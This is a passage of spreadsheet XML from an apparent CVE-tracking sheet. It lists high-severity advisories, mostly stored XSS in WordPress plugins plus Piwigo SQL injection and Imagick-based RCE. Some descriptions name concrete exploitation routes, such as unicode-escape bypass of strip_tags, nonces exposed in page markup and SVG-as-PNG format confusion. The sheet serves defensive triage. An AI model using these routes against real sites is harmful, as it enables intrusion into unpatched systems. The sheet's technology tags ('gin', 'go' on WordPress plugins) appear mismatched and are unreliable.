      </c>
      <c r="C93" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42324</t>
        </is>
      </c>
      <c r="D93" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E93" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F93" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G93" s="5" t="inlineStr"/>
      <c r="H93" s="5" t="inlineStr"/>
      <c r="I93" s="5" t="inlineStr"/>
      <c r="J93" s="5" t="inlineStr">
        <is>
          <t>php, express, go, hp</t>
        </is>
      </c>
      <c r="K93" s="5" t="inlineStr"/>
      <c r="L93" s="5" t="inlineStr"/>
      <c r="M93" s="5" t="inlineStr"/>
      <c r="N93" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O93" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P93" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q93" s="5" t="inlineStr"/>
      <c r="R93" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S93" s="5" t="inlineStr">
        <is>
          <t>Piwigo is a full featured open source photo gallery application for the web. Prior to 16.4.0, admin/element_set_ranks.php stores administrator-controlled image_order[] values without enforcing the existing sort-field whitelist. The stored album image_order expression is later concatenated into ORDER BY clauses by admin/batch_manager_global.php, admin/batch_manager_unit.php, include/section_init.inc.php, and include/ws_functions/pwg.categories.php. When at least one album contains at least one photo, an authenticated administrator can store a crafted expression and trigger it in a later album or Batch Manager query to disclose, modify, or disrupt database data. This issue is fixed in version 16.4.0.</t>
        </is>
      </c>
      <c r="T93" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42324</t>
        </is>
      </c>
    </row>
    <row r="94">
      <c r="A94" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B94" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C94" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83591</t>
        </is>
      </c>
      <c r="D94" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E94" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F94" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G94" s="5" t="inlineStr"/>
      <c r="H94" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I94" s="5" t="inlineStr"/>
      <c r="J94" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K94" s="5" t="inlineStr"/>
      <c r="L94" s="5" t="inlineStr"/>
      <c r="M94" s="5" t="inlineStr"/>
      <c r="N94" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O94" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P94" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q94" s="5" t="inlineStr"/>
      <c r="R94" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S94" s="5" t="inlineStr">
        <is>
          <t>The AMP for WP – Accelerated Mobile Pages plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Comment Content via Regex Transformation in all versions up to, and including, 1.1.16 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The crafted payload uses only WordPress-permitted comment tags and attributes (an anchor with href and title), and the AMP sanitizer pipeline omits javascript: protocol blocking, meaning neither the comment save filter nor the AMP output stage removes the malicious URI introduced by the transformation.</t>
        </is>
      </c>
      <c r="T94" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83591</t>
        </is>
      </c>
    </row>
    <row r="95">
      <c r="A95" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B95" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C95" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84279</t>
        </is>
      </c>
      <c r="D95" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E95" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F95" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G95" s="5" t="inlineStr"/>
      <c r="H95" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I95" s="5" t="inlineStr"/>
      <c r="J95" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K95" s="5" t="inlineStr"/>
      <c r="L95" s="5" t="inlineStr"/>
      <c r="M95" s="5" t="inlineStr"/>
      <c r="N95" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O95" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P95" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q95" s="5" t="inlineStr"/>
      <c r="R95" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S95" s="5" t="inlineStr">
        <is>
          <t>The Fancy Product Designer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'output_format' parameter in all versions up to, and including, 6.5.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This requires the Pro Export/Genius feature to be enabled on the site, as the vulnerable fpd_pr_export AJAX action is only registered when that feature is active.</t>
        </is>
      </c>
      <c r="T95" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84279</t>
        </is>
      </c>
    </row>
    <row r="96">
      <c r="A96" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B96" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C96" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84280</t>
        </is>
      </c>
      <c r="D96" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E96" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F96" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G96" s="5" t="inlineStr"/>
      <c r="H96" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I96" s="5" t="inlineStr"/>
      <c r="J96" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K96" s="5" t="inlineStr"/>
      <c r="L96" s="5" t="inlineStr"/>
      <c r="M96" s="5" t="inlineStr"/>
      <c r="N96" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O96" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P96" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q96" s="5" t="inlineStr"/>
      <c r="R96" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S96" s="5" t="inlineStr">
        <is>
          <t>The Fancy Product Designer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Shortcode Order 'elements[].title' Parameter in all versions up to, and including, 6.5.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The injected payload is written to the DOM via innerHTML within the beforeElementAdd JavaScript event handler when processing the elements[].title field from the stored order JSON, meaning execution occurs specifically when an administrator reviews shortcode orders in the WordPress admin panel.</t>
        </is>
      </c>
      <c r="T96" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84280</t>
        </is>
      </c>
    </row>
    <row r="97">
      <c r="A97" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B97" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C97" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84281</t>
        </is>
      </c>
      <c r="D97" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E97" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F97" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G97" s="5" t="inlineStr"/>
      <c r="H97" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I97" s="5" t="inlineStr"/>
      <c r="J97" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K97" s="5" t="inlineStr"/>
      <c r="L97" s="5" t="inlineStr"/>
      <c r="M97" s="5" t="inlineStr"/>
      <c r="N97" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O97" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P97" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q97" s="5" t="inlineStr"/>
      <c r="R97" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S97" s="5" t="inlineStr">
        <is>
          <t>The Fancy Product Designer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'productTitle' in '_fpd_data' Order Item Meta in all versions up to, and including, 6.5.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The fpd_save_order AJAX action is registered for unauthenticated users via wp_ajax_nopriv_fpd_save_order with no nonce or capability check, and the strip_tags() sanitization applied at save time is bypassed by submitting JSON unicode escape sequences (e.g. \u003c, \u003e), which json_decode() silently converts back to literal angle brackets when the order is rendered in the admin view.</t>
        </is>
      </c>
      <c r="T97" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84281</t>
        </is>
      </c>
    </row>
    <row r="98">
      <c r="A98" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B98" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C98" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85750</t>
        </is>
      </c>
      <c r="D98" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E98" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F98" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G98" s="5" t="inlineStr"/>
      <c r="H98" s="5" t="inlineStr"/>
      <c r="I98" s="5" t="inlineStr"/>
      <c r="J98" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K98" s="5" t="inlineStr"/>
      <c r="L98" s="5" t="inlineStr"/>
      <c r="M98" s="5" t="inlineStr"/>
      <c r="N98" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O98" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P98" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q98" s="5" t="inlineStr"/>
      <c r="R98" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="S98" s="5" t="inlineStr">
        <is>
          <t>Piwigo before v16.4.0 is vulnerable to arbitrary file read and remote code execution in image upload handling when using the Imagick library due to insufficient validation and unsafe processing of user-supplied image files. By abusing format confusion (e.g., disguising SVG content as PNG), an attacker can trigger unintended interpretation of embedded SVG elements that reference local files. In more advanced scenarios, the Imagick support for Magick Scripting Language (MSL) may be abused to process attacker-controlled instructions, potentially leading to unauthorized server-side file writes and remote code execution, depending on configuration. This has been patched in 16.4.0.</t>
        </is>
      </c>
      <c r="T98" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85750</t>
        </is>
      </c>
    </row>
    <row r="99">
      <c r="A99" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B99" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C99" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93303</t>
        </is>
      </c>
      <c r="D99" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E99" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F99" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G99" s="5" t="inlineStr"/>
      <c r="H99" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I99" s="5" t="inlineStr"/>
      <c r="J99" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K99" s="5" t="inlineStr"/>
      <c r="L99" s="5" t="inlineStr"/>
      <c r="M99" s="5" t="inlineStr"/>
      <c r="N99" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O99" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P99" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q99" s="5" t="inlineStr"/>
      <c r="R99" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S99" s="5" t="inlineStr">
        <is>
          <t>The HT Contact Form – Drag &amp; Drop Form Builder for WordPress plugin for WordPress is vulnerable to Stored DOM-Based Cross-Site Scripting via 'form_data' Rich Text Field via Draft Save/Resume in all versions up to, and including, 2.10.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. Exploitation requires tricking a user into clicking an attacker-supplied draft resume URL, which the attacker constructs using the draft_key and access_token returned directly in the save response.</t>
        </is>
      </c>
      <c r="T99" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93303</t>
        </is>
      </c>
    </row>
    <row r="100">
      <c r="A100" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B100" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C100" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93654</t>
        </is>
      </c>
      <c r="D100" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E100" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F100" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G100" s="5" t="inlineStr"/>
      <c r="H100" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I100" s="5" t="inlineStr"/>
      <c r="J100" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K100" s="5" t="inlineStr"/>
      <c r="L100" s="5" t="inlineStr"/>
      <c r="M100" s="5" t="inlineStr"/>
      <c r="N100" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O100" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P100" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q100" s="5" t="inlineStr"/>
      <c r="R100" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S100" s="5" t="inlineStr">
        <is>
          <t>The Premium Packages – Sell Digital Products Securely plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'cart_items[][product_name]' Parameter in all versions up to, and including, 7.2.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The checkout REST route uses permission_callback set to __return_true and the invoice loader performs no order ownership check, meaning an unauthenticated attacker can both persist the payload and ensure it is renderable to any logged-in user who accesses the invoice.</t>
        </is>
      </c>
      <c r="T100" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93654</t>
        </is>
      </c>
    </row>
    <row r="101">
      <c r="A101" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B101" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C101" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94573</t>
        </is>
      </c>
      <c r="D101" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E101" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F101" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G101" s="5" t="inlineStr"/>
      <c r="H101" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I101" s="5" t="inlineStr"/>
      <c r="J101" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K101" s="5" t="inlineStr"/>
      <c r="L101" s="5" t="inlineStr"/>
      <c r="M101" s="5" t="inlineStr"/>
      <c r="N101" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O101" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P101" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q101" s="5" t="inlineStr"/>
      <c r="R101" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S101" s="5" t="inlineStr">
        <is>
          <t>The Repeater Fields for Elementor Forms plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Repeater Field Value in all versions up to, and including, 2.2.7 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</t>
        </is>
      </c>
      <c r="T101" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94573</t>
        </is>
      </c>
    </row>
    <row r="102">
      <c r="A102" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B102" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C102" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-95864</t>
        </is>
      </c>
      <c r="D102" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E102" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F102" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G102" s="5" t="inlineStr"/>
      <c r="H102" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I102" s="5" t="inlineStr"/>
      <c r="J102" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K102" s="5" t="inlineStr"/>
      <c r="L102" s="5" t="inlineStr"/>
      <c r="M102" s="5" t="inlineStr"/>
      <c r="N102" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O102" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P102" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q102" s="5" t="inlineStr"/>
      <c r="R102" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S102" s="5" t="inlineStr">
        <is>
          <t>The Themify Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'css[fonts]' Parameter in all versions up to, and including, 7.8.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The nonce required to reach the vulnerable endpoint is embedded in plain sight within the front-end page markup for all visitors, reducing the access control to a CSRF token rather than an authentication barrier and making the endpoint fully exploitable by unauthenticated attackers.</t>
        </is>
      </c>
      <c r="T102" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-95864</t>
        </is>
      </c>
    </row>
    <row r="103">
      <c r="A103" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B103" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C103" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-95866</t>
        </is>
      </c>
      <c r="D103" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E103" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F103" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G103" s="5" t="inlineStr"/>
      <c r="H103" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I103" s="5" t="inlineStr"/>
      <c r="J103" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K103" s="5" t="inlineStr"/>
      <c r="L103" s="5" t="inlineStr"/>
      <c r="M103" s="5" t="inlineStr"/>
      <c r="N103" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O103" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P103" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q103" s="5" t="inlineStr"/>
      <c r="R103" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S103" s="5" t="inlineStr">
        <is>
          <t>The User Profile Builder – Beautiful User Registration Forms, User Profiles &amp; User Role Editor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Avatar Field in all versions up to, and including, 4.0.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The zero-length multipart file branch in wppb_save_avatar_value() writes the raw request value directly to user meta, bypassing the wppb_save_attachment_id()/wppb_verify_attachment_id() validation path; the stored payload is later adopted as a WordPress attachment URL and rendered unescaped by wppb_default_fields_make_upload_button() when an administrator views the affected account.</t>
        </is>
      </c>
      <c r="T103" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-95866</t>
        </is>
      </c>
    </row>
    <row r="104">
      <c r="A104" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B104" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C104" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96039</t>
        </is>
      </c>
      <c r="D104" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E104" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F104" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G104" s="5" t="inlineStr"/>
      <c r="H104" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I104" s="5" t="inlineStr"/>
      <c r="J104" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K104" s="5" t="inlineStr"/>
      <c r="L104" s="5" t="inlineStr"/>
      <c r="M104" s="5" t="inlineStr"/>
      <c r="N104" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O104" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P104" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q104" s="5" t="inlineStr"/>
      <c r="R104" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S104" s="5" t="inlineStr">
        <is>
          <t>The BA Book Everything plugin for WordPress is vulnerable to Stored Cross-Site Scripting via first_name Parameter in all versions up to, and including, 1.8.27 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. An unauthenticated attacker can obtain the valid order_id, order_num, and order_hash credentials required to reach the vulnerable action_to_pay() handler simply by placing a guest booking through the public [babe-booking-form] shortcode, making the full exploit chain reachable without any account.</t>
        </is>
      </c>
      <c r="T104" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96039</t>
        </is>
      </c>
    </row>
    <row r="105">
      <c r="A105" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B105" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C105" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96568</t>
        </is>
      </c>
      <c r="D105" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E105" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F105" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G105" s="5" t="inlineStr"/>
      <c r="H105" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I105" s="5" t="inlineStr"/>
      <c r="J105" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K105" s="5" t="inlineStr"/>
      <c r="L105" s="5" t="inlineStr"/>
      <c r="M105" s="5" t="inlineStr"/>
      <c r="N105" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O105" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P105" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q105" s="5" t="inlineStr"/>
      <c r="R105" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S105" s="5" t="inlineStr">
        <is>
          <t>The Restaurant Menu and Food Ordering plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'phone_number' parameter in all versions up to, and including, 2.4.14 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</t>
        </is>
      </c>
      <c r="T105" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96568</t>
        </is>
      </c>
    </row>
    <row r="106">
      <c r="A106" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B106" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C106" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96752</t>
        </is>
      </c>
      <c r="D106" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E106" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F106" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G106" s="5" t="inlineStr"/>
      <c r="H106" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I106" s="5" t="inlineStr"/>
      <c r="J106" s="5" t="inlineStr">
        <is>
          <t>php, gin, hp</t>
        </is>
      </c>
      <c r="K106" s="5" t="inlineStr"/>
      <c r="L106" s="5" t="inlineStr"/>
      <c r="M106" s="5" t="inlineStr"/>
      <c r="N106" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O106" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P106" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q106" s="5" t="inlineStr"/>
      <c r="R106" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S106" s="5" t="inlineStr">
        <is>
          <t>The Zero Spam for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Nested POST Array Keys via Contact Form 7 Integration in all versions up to, and including, 5.7.10 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The payload is delivered by submitting a Contact Form 7 request with a nested POST array key containing arbitrary HTML or JavaScript — PHP parses the field name into a nested array key, which is stored verbatim in the zerospam_log.submission_data column when Zero Spam flags the submission as spam due to the absence of the zerospam_david_walsh_key field.</t>
        </is>
      </c>
      <c r="T106" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96752</t>
        </is>
      </c>
    </row>
    <row r="107">
      <c r="A107" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B107" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C107" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97060</t>
        </is>
      </c>
      <c r="D107" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E107" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F107" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G107" s="5" t="inlineStr"/>
      <c r="H107" s="5" t="inlineStr"/>
      <c r="I107" s="5" t="inlineStr"/>
      <c r="J107" s="5" t="inlineStr">
        <is>
          <t>spring</t>
        </is>
      </c>
      <c r="K107" s="5" t="inlineStr"/>
